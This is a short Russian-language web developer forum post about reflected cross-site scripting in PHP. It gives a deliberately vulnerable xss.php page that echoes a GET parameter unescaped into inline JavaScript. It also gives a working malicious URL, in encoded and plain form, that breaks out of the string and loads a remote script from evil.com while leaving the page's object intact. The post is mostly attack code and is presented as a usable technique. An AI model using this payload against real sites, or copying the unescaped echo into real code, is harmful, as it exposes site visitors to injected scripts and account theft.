Показать сообщение отдельно
  #11 (permalink)  
Старый 19.07.2013, 15:07
Профессор
Отправить личное сообщение для mta88 Посмотреть профиль Найти все сообщения от mta88
 
Регистрация: 16.05.2013
Сообщений: 229

//http://site.com/?var=1;alert(123);alert(456)
var myVar = <?=$_GET['var']?>

да, да, я что-то такое хотел, но настоящее, чтобы не разрушить зараженный объект и выполнить дополнительный код

получилось вот так
// xss.php
<!doctype html>
<html>
<head>
  <script>
    window.onload = function() {
      var obj = {
        url: 'getdata.php?var=<?php echo $_GET["var"]; ?>'
      }
    }
  </script>
</head>

<body></body>
</html>

а вот вредный url:
xss.php?var=12%27,%20t1:%20%28function%28%29{var%20s=document.createElement%28%27script%27%29;s.type=%22text/javascript%22;s.src=%22http://evil.com/script.js%22;document.body.appendChild%28s%29}%29%28%29,%20t2:%27

или так
xss.php?var=12', t1: (function(){var s=document.createElement('script');s.type="text/javascript";s.src="http://evil.com/script.js";document.body.appendChild(s)})(), t2:'

хотя это уже оффтоп конечно
Ответить с цитированием